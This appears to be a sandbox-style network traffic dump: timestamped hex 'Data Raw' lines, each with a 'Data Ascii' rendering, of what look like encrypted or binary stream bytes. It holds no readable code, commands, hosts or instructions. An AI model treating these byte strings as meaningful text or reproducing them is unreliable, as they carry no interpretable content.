                                                                                              2022-01-28 18:02:09 UTC273INData Raw: 21 43 f7 09 a8 74 81 b7 22 23 a5 73 9c 7d 6c 0e cf 5c 37 b6 f2 bc 38 7b 88 29 d5 0f 8d c6 27 3f fd 16 eb b8 b4 55 b1 32 4c 8f db fe 97 1f 54 4c 60 2d 30 a8 74 f9 5c d8 17 87 a6 f6 db 06 13 73 0b f0 bb b3 af e5 2f c4 c3 41 12 7a ea ca 1c dc ee c0 36 99 1a e1 19 8c 53 21 a0 07 1a 69 1e 5f 27 b7 45 7a 62 a0 f0 54 a3 ee 2f d4 fc 63 5a c3 51 2c 4c 9f f4 4f 26 2d df 89 ac 85 a1 e9 a2 6c e1 8e 58 ae 8b d1 65 4f 26 3d f8 59 bf b9 c8 dd 93 2a b8 b4 55 36 99 e5 a8 8b 3e 7b 67 9b ea 35 e4 da 0c fa a1 f9 db 8e c8 5d ca e3 63 9a a7 09 73 03 e3 a3 7e 1f 2b ca e3 a3 7e 1f 2b 4a 9a 67 64 5c c8 dd 13 8c 43 08 f0 44 8a 3e 7b 98 62 d7 84 2f d4 fc 63 5a c3 51 2c 4c 9f f4 4f 26 3d f8 59 40 80 24 3c 76 0a f5 d1 75 c8 dd 93 d5 5f 50 a9 0e d7 84 2f 2b 35 1b 5e 32 a3 fe 68 18 16
                                                                                              Data Ascii: !Ct"#s}l\78{)'?U2LTL`-0t\s/Az6S!i_'EzbT/cZQ,LO&-lXeO&=Y*U6>{g5]cs~+~+Jgd\CD>{b/cZQ,LO&=Y@$<vu_P/+5^2h
                                                                                              2022-01-28 18:02:09 UTC282INData Raw: c2 db 8e 40 95 db de 13 bc b9 57 3c 06 e3 43 02 d3 6b 6e f0 55 37 e9 b2 d5 6f 79 8e 49 00 db 90 7a 02 e1 81 f3 db 8e 68 83 bb 3c 7f b5 2c 4c 9f f6 34 61 55 ad 30 57 3b a3 f5 a1 f5 11 89 5c d8 f7 c4 d3 34 60 f3 cc be f0 65 5f 07 09 52 ae 90 7c 03 83 b9 65 46 8f c3 65 46 8f c2 9a 7e 1f a1 9d f6 54 b8 c0 d0 f2 43 11 86 34 61 37 e7 ad 19 92 52 ae 9b ba bb 3c 62 d6 0f 82 29 cb 64 dc 11 86 b4 aa 90 d5 57 3b f3 9c 63 2a 57 fb f3 2c 58 4e b2 a5 31 d8 23 b5 14 3b d7 84 15 f5 f5 d1 7e 2a 5e cd 6a ec 7a 15 91 4b 34 11 8b 53 21 b0 ac a1 e9 b2 a8 df 89 bc b9 28 5b 35 ef 90 41 02 e9 86 3b f3 c5 32 53 31 df 96 5c c8 dd f1 c3 51 2d cb 64 dc 11 d7 86 34 60 d7 85 b1 22 33 4e a4 81 3c 5e cd 6a bc af fd f4 bf 52 ae 8f ca fc 63 43 3c 69 69 73 e7 b2 a5 18 6d 6b 6e fd cb 7c 4a
                                                                                              Data Ascii: @W<CknU7oyIzh<,L4aU0W;\4`e_R|eFeF~TC4a7R<b)dW;c*W,XN1#;~*^jzK4S!([5A;2S1\Q-d4`"3N<^jRcC<iismkn|J
                                                                                              2022-01-28 18:02:09 UTC289INData Raw: 8d 39 e7 d9 49 92 1b a1 f9 e1 c2 cb ee 77 a4 f4 4f 26 3d c2 8b fc e3 8b 2d 4c d7 48 58 72 cc 24 f4 83 60 1e e4 e9 7e d3 b6 63 96 91 1c e0 44 aa 54 30 1f 93 f1 b3 ac dd a3 da 50 22 7b 50 dc e9 89 f4 47 d5 fc 2b ca e3 9f af 18 94 10 32 d5 37 09 06 1d 23 fd e6 2b ce 7f b7 cd a2 f7 9e a3 cd a9 85 fd e6 2b cf ff fe 97 f0 32 d7 cc 36 ed f5 ca 08 c7 d0 ba b9 37 d5 45 30 da 44 aa 7c 99 ad 4f 36 42 f1 4e ec 32 78 4c 16 5c 04 2a 8b 0d b1 ee fc 4b d8 84 67 9b 15 7c 21 58 bb 48 5d cf 27 c0 c9 54 ce e0 90 06 c3 bd c2 86 f8 95 16 d8 cb a9 c2 02 2d 03 af d1 b9 fb 2d 03 af de 4b 3c b2 26 75 49 9c ad 8c 4c 5f 50 a9 0b 40 01 97 d3 7b 13 c4 39 65 17 b7 de 95 92 06 ab df 55 fa 92 9f 38 a7 c5 9a ab df 55 fa 92 9f 37 b4 8a fa dd db 1e d7 7b 66 9a 8f cb 65 5f 58 07 87 3d b0 80
                                                                                              Data Ascii: 9IwO&=-LHXr$`~cDT0P"{PG+27#++267E0D|O6BN2xL\*Kg|!XH]'T--K<&uIL_P@{9eU8U7{fe_X=
                                                                                              2022-01-28 18:02:09 UTC305INData Raw: 42 cd 62 f3 90 c7 13 40 4c 53 fd 2a 8b 0d b1 ee fc 3c 28 03 3c 37 d9 4d a2 34 01 7a 61 de 5e 95 fe 04 6d 3c 26 19 c0 42 cd 95 25 45 63 d8 08 2f ef 8a 3e 7b dc 86 21 4f eb 3c 3e 72 74 eb 32 14 0f 82 6d 69 7c e5 6e 7d d4 33 55 7f ae ef 34 e4 68 e7 ad 5d ec 2f 2b 04 6d 3c 7f d6 f7 53 79 b2 81 d3 f1 8b e9 96 21 3b bf 66 c6 9c 13 83 5f 89 37 a1 23 b1 32 53 ea 36 2e 48 7f 49 65 90 75 c0 10 8e 00 cb a5 80 6c ff 9e 41 3b bf 47 59 cd 22 f1 c4 9b ee df 58 f6 97 6b 26 15 c4 58 f6 6b 1d 79 a9 46 8f cb 20 46 9a 98 ac 1e 60 d2 f7 92 aa 85 4e 5a 48 d1 b8 3f b5 db bd 04 e6 2b ca 71 fa 51 d3 ff a3 25 89 bc bf 03 d0 e7 52 60 59 08 f9 af eb 32 14 0b 97 21 f8 71 03 48 dc 21 cd e1 d6 01 5e 88 cc fd 19 56 33 96 af 96 15 78 9b a2 4c 73 00 93 82 6b 38 2a 10 1d 82 5e 44 c2 de 32
                                                                                              Data Ascii: Bb@LS*<(<7M4za^m<&B%Ec/>{!O<>rt2mi|n}3U4h]/+m<Sy!;f_7#2S6.HIeulA;GY"Xk&XkyF F`NZH?+qQ%R`Y2!qH!^V3xLsk8*^D2
                                                                                              2022-01-28 18:02:09 UTC314INData Raw: 6a a4 81 a7 08 91 55 39 0a 70 be 3b 0c 05 11 03 6c 31 d9 89 9f c9 bf cd 23 b5 2d cf 7f 1b e0 fb 6a a8 74 f9 2c d0 1a 3e 5f 2c c5 1a f6 19 11 cf 67 2a ca af 35 c0 8d 4f 6e 26 48 1d e2 f0 01 d3 32 5c c8 dc 28 c6 d7 44 0f ca 1b 2a 0b 78 10 6f 3e 6e 09 bb b7 7a c7 68 21 3b be c4 d3 10 80 31 26 3d f8 30 cc fd 19 54 38 23 67 57 fc e8 7d 9d ef a8 12 1f 54 a7 7d 62 52 e3 52 ec 35 a9 ff d0 bf b6 ed b2 e9 42 be 88 cc aa 9f b9 c2 f5 9c bc fa d5 03 16 cf ea 7d 45 50 22 7b 98 62 d7 01 db 81 67 e1 7e 94 1c 33 91 5d 0e 00 24 c0 ed 55 16 30 33 57 77 65 12 87 fe 40 a4 cd e3 eb 67 29 48 dc c1 06 62 1a 3d b9 fe 73 5b b2 ed 79 19 d5 97 a5 8a 76 0b 78 61 a8 8e 0c f5 99 05 15 a8 7e 3c 3b 05 73 ce 32 d7 84 2f a5 b3 22 b8 fc 9c e7 e9 6a 1b e9 76 80 6d 74 06 eb 7f 1f ea 3d b6 22
                                                                                              Data Ascii: jU9p;l1#-jt,>_,g*5On&H2\(D*xo>nzh!;1&=0T8#gW}T}bRR5B}EP"{bg~3]$U03Wwe@g)Hb=s[yvxa~<;s2/"jvmt="
                                                                                              2022-01-28 18:02:09 UTC330INData Raw: 95 da 0c f8 59 40 80 25 ba b9 2e d2 f7 d6 10 f8 59 40 80 24 38 69 69 69 69 6a ec 3a 72 50 a9 0e ee d1 75 88 39 ee 3f ff eb 97 e0 1a 1e 28 5a 73 83 ac fb 84 43 7a 61 26 3d fa 5e cd 6a ef c2 ce ef e2 20 2e 43 d7 84 2f d4 fc 63 58 be c4 d3 7c 1a 1e 20 e6 2b ca f2 8e 48 94 58 be c4 d1 75 88 39 e6 2b ca e1 d2 f7 d6 10 bc bf 46 8f cb 65 5d 4a 9a 67 6c f1 c7 59 cc e8 30 46 24 38 6b 6e f6 54 b1 22 33 21 4f 26 3d f8 59 40 80 35 77 8d c6 d8 07 6d 76 0b 78 ef 3d f8 59 40 82 2a 47 03 14 0f 82 2a 47 12 08 f0 44 8a 3d f8 59 44 7a 15 91 c1 2e 52 ae 9b ea 35 e6 2b ca e3 a2 7c 1a 06 43 08 84 46 f7 b3 49 78 4f 26 3f fd e6 2b cb 65 5f 49 07 6d 74 17 c5 56 b8 b4 aa 90 4c 9f f4 4f 25 ba b9 36 b6 af 1d b7 00 db 8e 48 94 58 bc bf 46 8f cd 6a ec 33 96 5d 4a 8b dd 93 d5 7f a2 7c
                                                                                              Data Ascii: Y@%.Y@$8iiiij:rPu9?(ZsCza&=^j .C/cX| +HXu9+Fe]JglY0F$8knT"3!O&=Y@5wmvx=Y@*G*GD=YDz.R5+|CFIxO&?+e_ImtVLO%6HXFj3]J|
                                                                                              2022-01-28 18:02:09 UTC346INData Raw: e8 30 57 38 6b 6e f7 e6 2b ca 82 5e ac f1 b5 03 63 5a c3 51 2c 4c 9f f4 4f 26 3d f8 59 46 8f cb 65 47 13 8f cb 65 5f 54 b3 27 c0 61 55 36 07 19 fd 82 5a ed bd 41 02 e1 9e 71 7e 1f ab 13 8c 43 08 f0 44 8a 3e 5b 44 89 bc bf 46 8a 3e 7b 98 c6 d8 07 0c 8e 29 a1 81 89 bc bf 46 8f cb 65 5f 50 a9 0e ff eb b7 32 5c c8 d8 9f f5 d2 f7 d6 01 58 be c4 d3 3a 70 fb e1 9e 02 92 31 f7 d6 01 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 13 8c 43 09 70 fb e1 9e 73 83 ac 95 ca e3 a3 fe 09 07 0c 9e 5f 50 a9 0e ff eb b7 32 5c c8 dd 93 d5 7f bc bf 46 8e 93 d4 ff eb b7 32 5d 4a 9a 6d 24 38 6b 6e 82 52 cb 11 a9 0e fc 63 5a c3 52 ae 9b eb 87 b6 af 19 c0 c9 60 d2 f7 d6 02 e1 9e 71 78 10 05 6d 34 61 55 32 15 91 d0 f2 49 17 94 58 be c4 d5 7f a2 7c 5a c3 51 28 7a 15 91 d0 f2 49 15 91 f0 44
                                                                                              Data Ascii: 0W8kn+^cZQ,LO&=YFeGe_T'aU6ZAq~CD>[DF>{)Fe_P2\X:p1^j:pq~Cps_P2\F2]Jm$8knRcZR`qxm4aU2IX|ZQ(zID
                                                                                              2022-01-28 18:02:09 UTC362INData Raw: 5d 18 19 9d ef c2 ce ed bd 41 00 66 e2 20 2e 52 ae 9b e8 a0 77 8d c6 d8 07 6d 74 06 eb b7 32 5c c8 dd 93 d5 e0 2b ca e1 9e 71 7e 1f ab 13 8e 72 00 db 8e 48 94 58 bc 95 da 0c fa 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 47 12 0b 78 10 05 68 e7 ad 1a 3b f3 cc e8 30 57 3b f1 db da 0c fb e1 9e 71 7e 1f ab 12 25 ba b9 37 e9 b2 a5 02 e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 53 01 5e cf 6f 79 92 53 31 d9 8b 4a 9a 67 64 dc 11 87 b4 b6 30 67 64 de 16 14 0f 82 2a 47 13 1f ab 13 8c 43 08 f0 45 04 e6 2b ca e3 a3 fe 68 e7 ad 18 19 9c 6c f1 c7 5b 15 91 d1 75 88 39 ee 3f fd e7 a4 81 a7 09 73 83 ac 95 29 c5 56 b8 b4 aa 90 4e a4 81 a7 09 73 83 ac 95 da 93 e5 a0 77 8e 48 94 58 be c4 d3 78 9b ea 35 e4 25 ba b9 35 f8 c6 e8 38 6b 6d 74 06 eb b7 32 5c c9 f3 cc e8 30 57
                                                                                              Data Ascii: ]Af .Rwmt2\+q~rHX^j:pq~Gxh;0W;q~%70W;0W;0W;S^oyS1Jgd0gd*GCE+hl[u9?s)VNswHXx5%58kmt2\0W
                                                                                              2022-01-28 18:02:09 UTC378INData Raw: b3 09 6d 74 06 f8 10 0e c4 d8 3d f6 57 3b e5 b5 2d cf 7c 1b aa ab 18 23 be cf 61 56 b9 33 c2 ce ed ae 9a 62 ec 31 e3 a8 80 2c 4f 27 c4 c8 dd 93 d8 1b a9 0d 7d b5 37 e9 b2 b6 ae 90 75 83 96 56 b3 2f d7 85 b5 34 61 55 25 bb 25 9d ee 2a 5f 50 a9 05 50 ba f0 44 87 a1 f9 db 9d ee 3a 4b 17 ad 13 87 b7 25 ac 95 da 1f e2 20 23 a0 77 8d d5 36 63 61 5e f7 de 15 91 dd 87 b6 af 0e fe 6d 4f 2d f5 d4 f7 d7 93 c6 d8 07 7e 1e 2d f4 44 b0 a5 08 f1 d4 ee 3f fd ff cc e8 25 ab 13 8c 50 e0 02 c6 d8 12 1a 1e 28 49 38 78 59 40 a1 f6 54 b3 34 60 c1 02 e0 1a 10 05 68 f4 06 eb b2 a8 8b c1 58 bf 55 7f bb 1b a0 62 db 8e 48 87 ff ee 04 ed 87 be c7 5b 53 3a 70 fb e4 1d b5 64 d9 b2 ae a1 f1 c4 d3 77 87 b6 af 18 21 a3 b7 32 51 25 ba b9 24 39 eb 8c 48 ae 9e 7a 1d a5 02 f2 41 02 e1 95 d1
                                                                                              Data Ascii: mt=W;-|#aV3b1,O'}7uV/4aU%%*_PPD:K% #w6ca^mO-~-D?%P(I8xY@T4`hXUbH[S:pdw!2Q%$9HzA
                                                                                              2022-01-28 18:02:09 UTC394INData Raw: d3 09 12 6f 0b 27 ae f2 28 2f b8 d8 63 05 0d 0b 11 f3 ad 76 54 ec 32 57 3b f3 c8 0b 70 f1 c7 5b 45 0d 14 c7 22 7b 9b e3 a3 fe 6c 21 be c7 5b 2e 31 b6 c3 0e 8f be b0 d2 96 29 b6 f0 21 c6 b1 56 d9 e7 f2 16 1c 23 b5 29 b4 a3 fe 68 e7 ad 71 b6 d6 41 01 57 3b f3 c8 79 9f f7 d6 64 a8 ea 41 71 21 c0 bc cb 17 f6 20 5d 15 f4 39 87 c2 af 73 dc 4e ac 95 da 08 c1 d4 f8 59 40 80 87 b1 22 31 d9 ed d8 7d f4 23 d4 95 ae f2 27 a9 51 73 87 b7 32 3b 9d 86 4e cd 06 8a 57 4f 4f 48 fd b9 68 e3 a3 fe 0c 9f 8e 21 dc 70 92 27 a9 60 bb 52 db d1 2a 43 08 f0 40 f1 5a c7 5f 50 a9 0e 5c ce ed a2 83 ac de 45 4c d2 b2 f5 88 6d 2b 9e 27 c4 cc 17 97 a4 c4 98 31 98 2f 98 23 f2 0c b6 e3 ea 6a b8 e2 24 3b 0c 05 68 ab 52 e9 f7 9a 2b 83 f3 98 34 65 5d ca 63 5a 87 f3 9a 35 a1 aa d5 2d 90 1a 48
                                                                                              Data Ascii: o'(/cvT2W;p[E"{l![.1)!V#)hqAW;ydAq! ]9sNY@"1}#'Qs2;NWOOHh!p'`R*C@Z_P\ELm+'1/#j$;hR+4e]cZ5-H
                                                                                              2022-01-28 18:02:09 UTC410INData Raw: 7b b8 80 12 67 49 37 db a0 4e 8a 0a d5 3c 56 ed f3 8b c0 c1 4b 1c 27 9d ef c6 d8 07 7c a7 09 73 83 ac 95 b3 ef b2 b5 2e 5b 45 0d 7d 70 e4 24 38 0e 8f b2 d1 2a 37 99 84 70 8c 24 56 d1 18 10 05 3a 71 7e 1f aa d2 ee 3e 7b ea 41 72 08 f0 44 8e 8b 5d 4b 1c 23 b5 2d cf 6f 79 96 5d 4a 9a 67 0d b5 39 4e a4 81 a6 c4 ca e2 20 5c ad 6c 9f 9d 80 54 ec 5f 34 0e 9c 02 84 70 fc 63 08 f1 c7 5b 44 c8 ce ec 3a 02 95 aa f4 2a 23 da 6f 71 7e 1f af 95 46 8e 48 94 58 be c4 d3 7a 11 87 b6 af 1d cf a7 1d 36 66 e2 21 f2 5a c2 ce 9f 91 a4 ef ab 7c 6a b3 42 e1 f1 a4 e4 41 5d 4d 21 af e2 20 65 0c bb 71 3b a3 a7 5d 15 c5 00 de 09 8c 43 4c da 47 41 43 45 41 43 4f 63 16 58 f7 89 e8 66 e7 ae 64 23 b5 61 14 48 d1 39 a2 35 bb 68 b1 27 c2 4e 24 38 2f 91 86 66 a7 5a 86 66 bd 15 c7 5e cc 68
                                                                                              Data Ascii: {gI7N<VK'|s.[E}p$8*7p$V:q~>{ArD]K#-oy]Jg9N \lT_4pc[D:*#oq~FHXz6f!Z|jBA]M! eq;]CLGACEACOcXfd#aH95h'N$8/fZf^h
                                                                                              2022-01-28 18:02:09 UTC426INData Raw: 84 67 f4 93 3e 7b 98 33 4d 24 b1 6a 3d 71 36 76 49 9c 24 ed 56 b8 b4 c0 6e e3 5c c8 dd c2 07 60 5f 18 19 9c 6d 54 5b 55 74 8f 83 bc ff 60 9a a6 0f ca e3 e3 bc b0 63 01 7e db 0d 35 24 09 73 83 c6 08 e5 57 3b f3 9d 1d ab 9e 39 02 94 98 e7 e5 b8 f6 df d1 b7 bb 74 23 c1 93 ec 7b 98 e9 f6 18 f2 44 ff 33 e7 af 96 41 76 d9 0c b2 a5 03 32 a6 93 5e 85 b1 22 59 fd f3 33 de 16 46 a8 86 b9 7f 69 e0 1b a1 f9 db 8e cc f7 d9 ef 01 05 48 50 2a 0f 42 b4 bb 49 d7 01 5e cd 38 46 8a b5 0d 91 53 79 c1 db 1c c8 22 cc 17 68 5f 93 8a 60 89 9c a8 08 b8 74 37 e9 b2 ce ab 06 14 1f e8 b9 7f a2 7c 48 d8 1a 97 a8 8b c1 19 ef cf e2 68 e7 ad 4a c0 cc 63 12 0a f5 ba a4 94 a7 09 73 d1 f2 44 07 25 b2 d5 f6 1c 1b 28 7e 6b ad 91 98 a2 f9 93 d5 7f a0 2b 22 33 de 16 15 28 42 85 b1 3a ca 2c c5
                                                                                              Data Ascii: g>{3M$j=q6vI$Vn\`_mT[Ut`c~5$sW;9t#{D3Av2^"Y3FiHP*BI^8FSy"h_`t7|HhJcsD%(~k+"3(B:,
                                                                                              2022-01-28 18:02:09 UTC442INData Raw: c0 44 07 92 ac 7d b1 b7 b9 c8 22 43 ab fb 99 e7 ac 3d 40 7f 5d a2 50 24 b5 d2 08 18 31 4c 14 f0 bb 4c 26 d5 07 6f 78 a4 39 11 78 f8 71 f3 41 fd 19 74 22 a6 0d 82 d5 0f 4d c9 18 1b a0 bb 84 d0 0d 95 fe e5 25 45 f2 a1 d9 1c a8 74 f9 ab f6 bc c7 59 41 b6 17 68 18 f1 e7 20 a3 01 a1 11 9b 7f 29 3a 8f bb c7 b3 5f 52 af f9 63 a5 fc 8b dd 1e a5 fc 9c 84 37 7c 91 2f 2b bb 2d 27 b8 b6 ad 80 9c 93 2a af 05 e5 25 45 f2 a1 ed 28 c9 9f 0b 09 54 5b 3d fa 5f e4 9d 10 fa b6 bb b1 af e2 df 71 6e 63 d1 8a c1 3a 4d c9 18 1b a5 c7 e3 5c 37 01 4e 29 48 6b 91 38 67 f1 4c 60 2d be 97 08 88 3b f1 e7 15 43 3b 0c 05 80 28 cf e2 df 67 10 ac 7d e5 a9 5b 51 44 82 40 c0 a3 ae e3 a6 9f d4 5d b5 d2 87 53 d9 d3 02 e4 3c 56 01 a1 06 03 0b fd 6d 8b 3e 0a 7f 4a e2 22 32 a0 cf 90 b1 ca 8b 4c
                                                                                              Data Ascii: D}"C=@]P$1LL&ox9xqAt"M%EtYAh ):_Rc7|/+-'*%E(T[=_qnc:M\7N)Hk8gL`-;C;(g}[QD@]S<Vm>J"2L
                                                                                              2022-01-28 18:02:09 UTC458INData Raw: 51 d3 85 42 f5 5c 45 f2 b6 5c a4 14 84 d0 0d cd cd 82 52 ac 94 f0 fc 9c 93 26 51 a1 74 f9 24 cb 0d e8 bb c3 ae 2b 77 65 27 c2 cc 54 0b 87 49 e4 4d ac 18 e6 d4 0f e6 be 4f d9 76 bb ef 2a 3f ff ea 81 1f 54 4c 6c 95 57 b6 50 56 4b 7c 8f 40 7f 5d fa b7 da 74 04 e7 6d cc 17 68 14 6f f4 c2 31 26 ce b1 b7 b9 c8 22 83 53 d9 f1 c5 54 93 6d 8b 3e 88 65 d2 7a ea ca 10 5d df 12 f5 2e e3 b6 47 6a ee 3e 8b 79 6d 8b 32 04 6b e3 5c 37 1a 4a 0f 09 8c bc 0e d4 14 77 8f ca 2f 6c 0e 00 28 16 99 68 18 e6 d8 57 ae 10 fa a1 48 d5 97 98 60 d1 71 c6 27 3f 0e af 90 c3 ae 64 2f 98 f7 5d b5 d2 46 d8 ef ba bb 3d 1c 9b 15 6e 05 24 b5 a0 88 c6 2b 82 bf cd 95 25 0b 15 79 ea 37 e8 fc db 71 81 54 fb 6c 7c e5 57 c8 99 70 70 04 19 2d 4c 77 f5 d3 7b 7c a2 ae a8 74 f9 28 06 66 6f 86 ca 57 e2
                                                                                              Data Ascii: QB\E\R&Qt$+we'TIMOv*?TLlWPVK|@]tmho1&"STm>ez].Gj>ym2k\7Jw/l(hWH`q'?d/]F=n$+%y7qTl|Wpp-Lw{|t(foW
                                                                                              2022-01-28 18:02:09 UTC474INData Raw: d0 f3 3c ce 12 f5 2c f0 c9 ed 42 7a e8 88 ac 1e d7 7b 68 4d c9 18 1b a0 93 6d 8b 3e 86 8c ce 60 2d 30 aa 24 ad 93 2a b8 44 4a 72 78 12 0b d0 4a 48 a7 f6 ab ee 8b 4c 12 f5 2e ba b3 cf 17 92 4a ba 18 61 54 e6 3f 47 ed 42 75 c5 be 9e 09 76 12 2a fe 97 1f 55 26 b8 3f 02 1e d8 f5 39 96 5f 52 22 8b 3e 84 d1 65 d2 7a ea ca 1d aa 05 e3 5c 37 18 11 6f 01 5c ca bf fe 97 1f 55 3a fd 6b 91 2f 2a 4f b3 ac 6a 13 7d 83 44 f2 4b 1e 8c fb 1e d7 7a 1d 2b 47 ed 42 7b 9c f9 50 56 47 e3 97 08 88 3b f1 5f e8 cf 90 b0 a4 0c 77 72 ff 15 91 45 86 cb 9a 96 17 7f da 0e fe dc a9 f1 38 95 da 81 2a b8 4b e1 62 42 0e 00 24 c9 00 33 a6 84 2d ef 7a ea ca 1e d4 71 f3 33 21 4d d9 1c a8 74 f9 2a 31 31 a1 fb e0 b3 9f 0b 87 4b e4 a8 06 14 f0 b9 c3 c4 58 41 fd 17 1b 49 6f 7b 99 29 7d 4f 15 6e
                                                                                              Data Ascii: <,Bz{hMm>`-0$*DJrxJHL.JaT?GBuv*U&?9_R">ez\7o\U:k/*Oj}DKz+GB{PVG;_wrE8*KbB$3-zq3!Mt*11KXAIo{)}On
                                                                                              2022-01-28 18:02:09 UTC490INData Raw: 56 50 a6 f2 49 e8 4d a1 3a fb 0a 1e d7 7b 92 ed 54 70 04 19 8d 4a 72 00 db 8e 4c 25 66 a7 84 57 3a 5e ad 70 eb 3e 1f f2 10 5f 90 7d 62 28 49 01 b6 50 56 c4 84 c7 23 b4 af dd 32 5d f8 21 b4 55 c2 c3 da 0d 17 c7 b7 77 00 d0 0a b0 66 16 51 a5 df dc 9a 98 9d 9c 05 80 f8 0c 77 72 ff d8 56 50 a2 8c 06 2d 23 f0 cd 8a 7b 13 73 7c 56 f0 ac 53 ba 59 15 1c 6b 13 8c 47 69 ea ca 1c dd ab fb 22 b8 66 d1 bd ca 1c dc 58 69 81 61 de c1 fc 6c 92 b8 4b e3 a8 f0 ac 6a 13 f0 f8 b1 5a c2 cb 01 ff ea 87 ce e8 31 15 9c e7 ac ff bb d0 b7 bf 4d d9 cc 2e a6 c3 d8 e3 e6 a0 88 c6 ab dd 7b 7c 4f ab ec c5 65 e9 5a c8 2d 8a f8 b5 68 6e 1e 6d ff 14 f0 08 5d a2 ba 32 b4 ff 66 e2 20 2e ff 66 ed bd 45 76 88 c6 27 3e da e4 e6 a0 a5 30 9f 7f 5d b5 67 d8 ef 04 6d 7c 4f ad 71 0b 87 49 e8 b1 44
                                                                                              Data Ascii: VPIM:{TpJrL%fW:^p>_}b(IPV#2]!UwfQwrVP-#{s|VSYkGi"fXialKjZ1M.{|OeZ-hnm]2f .fEv'>0]gm|OqID
                                                                                              2022-01-28 18:02:09 UTC506INData Raw: a1 fc 7b bc aa 6f 89 f9 56 47 ed 40 0f 6a 1c 66 6f aa 1b 81 2e 36 56 47 76 73 83 42 0f ea 60 12 39 11 78 f4 a4 69 39 1e 6d f9 03 e8 c2 45 5b 16 e4 e1 1d 4a 11 d2 34 3c 93 5e 96 03 88 d2 08 0f c8 2d 26 fe 97 1f f3 fa b6 af 1d a6 84 95 32 19 11 ff eb 59 6e 9e 61 dc 75 d1 2c 16 d4 cf 9f 1f 54 4c d4 ee d6 c2 31 26 c7 eb 5f a0 32 d1 0d 7d 73 8f a3 ee b6 cb 3c 2f 8e 88 0a 0a 0a a1 a0 9f 32 d7 68 b2 2e ad e7 f7 8d 2e 52 ae 9b eb 0d 02 1e d7 7b 21 58 fb 6a 13 73 da 8d 2e aa c5 dd 7b dd 1e 78 fc 26 b0 5f af ea d1 9d ee 3f 44 ec 29 4e c2 1e d7 84 a4 f9 de 17 e7 0c aa 60 97 6d 27 c0 c9 64 dc 79 92 39 e6 41 22 ba dd a3 01 3a 08 f0 aa 95 b2 f0 84 1c dc ee da ad f0 14 ff ae 16 34 e8 54 83 53 55 4e a4 6f 5e a5 56 78 23 6d ff 19 17 7f ef 4b f0 09 fa 97 d3 2c 1f 43 cc 6b
                                                                                              Data Ascii: {oVG@jfo.6VGvsB`9xi9mE[J4<^-&2Ynau,TL1&_2}s</2h..R{!Xjs.{x&_?D)N`m'dy9A":4TSUNo^Vx#mK,Ck
                                                                                              2022-01-28 18:02:09 UTC522INData Raw: 7f a2 7c 1b a4 38 94 a7 f7 01 cb e8 cf 90 b0 0c 7f 2f d1 8a c1 b5 95 5f 96 a2 83 52 1a 9b 63 56 fb 6a ec 3a 70 62 53 3e bb b9 c8 22 80 1c cb 35 04 a3 75 d8 f8 a6 78 c7 de 9b ea 35 e5 ad 70 fb e1 9e c7 de 19 9c 6c e1 9e 9d 92 d2 08 0f 36 5c 20 7e 13 cf e4 75 54 f6 d9 95 b0 58 fb 68 ff a8 00 24 c7 f5 f2 a1 81 a2 7d a9 af e1 cb e8 3d 13 73 7c b4 98 8a 46 8a 3f 2d 6e 0a a0 fa 51 59 40 94 23 36 9a 3f 76 03 26 b6 8f 42 e1 ae 64 b8 cc e8 9f 9b 82 7f 62 e4 d9 cc 61 aa 6f 87 1a 9b 63 a5 fc 9d 47 97 69 96 a2 82 9a e2 a9 f1 38 95 56 3d 71 be f7 85 4e 5b bb b0 64 5d a6 0d 28 81 fc 1b a3 ec 72 c5 52 25 ba b9 37 16 31 26 c2 31 af f5 12 81 7f 29 96 cd a9 18 a9 cd 64 6c 32 51 9c af 11 37 2a 4c 2f 17 9e c1 88 31 69 aa 97 50 6a ea 85 72 05 d8 c4 d7 34 a2 7f 12 2b 21 ad 6c
                                                                                              Data Ascii: |8/_RcVj:pbS>"5ux5pl6\ ~uTXh$}=s|F?-nQY@#6?v&BdbaocGi8V=qN[d](rR%71&1)dl2Q7*L/1iPjr4+!l
                                                                                              2022-01-28 18:02:09 UTC538INData Raw: b6 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 2f d4 92 c7 9b 61 27 af 6f 0b 3d 8c 2d ae f2 3b 92 05 2d c2 b6 af 29 e1 e6 2b f9 33 a6 86 07 a1 81 a7 3f a9 76 0b 4e c4 ab 13 ba e5 d0 f2 7f fa 26 3d ce a1 81 a7 6f 59 40 80 24 34 19 9c 02 d9 89 bc bf 46 8f cb 65 5f 50 a9 0e ff eb b7 32 5c c8 dd 93 d5 7f a2 7c 1a 1e 28 42 85 c9 60 bc 87 76 80 67 08 9f 86 40 ee 50 ea 70 f2 31 d9 bd 65 27 c0 fa b6 d7 84 1c ef ba b9 01 0a 8d c6 ee 5f 28 42 b3 7b e0 1b 97 b8 cc e8 06 a7 71 7e 78 88 39 ee 3f ed c5 56 d5 9f f4 4f 26 3d f8 59 40 80 24 38 6b 6e f6 54 b3 27 c0 c9 60 d2 f7 d6 01 5e cd 6a ec 3a 08 f0 29 25 2a 30 38 07 0b 0a 90 38 24 53 52 cf 1b f2 0c f4 37 e9 86 10 7d 9d dc f9 a3 fe 5b 89 c4 d3 4c cb 1d a6 b0 c0 b1 22 05 34 19
                                                                                              Data Ascii: ;0W;0W;0W;0W;0/a'o=-;-)+3?vN&=oY@$4Fe_P2\|(B`vg@Pp1e'_(B{q~x9?VO&=Y@$8knT'`^j:)%*088$SR7}[L"4
                                                                                              2022-01-28 18:02:09 UTC545INData Raw: 4a f2 62 a2 7c 0a 8e cb bd ca 1c dc ef 3a b4 2b 9c 3f 3d 73 40 9c a8 08 30 64 de fd e2 04 a2 f7 d0 87 b6 af 0d 7d 8d e2 5c 49 e8 cf ae e3 4b 4c cd 6e d2 a3 73 9f 9e 95 1e ab 13 cc 65 9c 94 18 e6 db 8a 4a 5a 46 1f 68 bc af 94 00 81 58 41 fd 45 e5 50 ea ca 29 4c cd 3a 7e 6a 14 44 75 78 04 92 88 bc 47 50 56 48 90 3a a2 f9 c3 da 5f 90 c5 95 82 d5 80 fd ba 51 24 d0 71 81 58 47 86 dc 03 e8 37 9d 26 b8 48 dc 9a 69 1d 74 83 aa 81 f3 47 13 c6 52 67 55 fe e1 ce ca 96 a5 4a 65 af 1d a6 86 34 61 92 60 a6 4f a3 f6 df 09 b0 5f af e3 e9 5a c7 7f a6 05 3c b6 24 38 6f bb 61 b0 2b 91 8e 17 87 3f 15 c4 58 42 c0 42 62 a2 37 af e2 df 67 0f 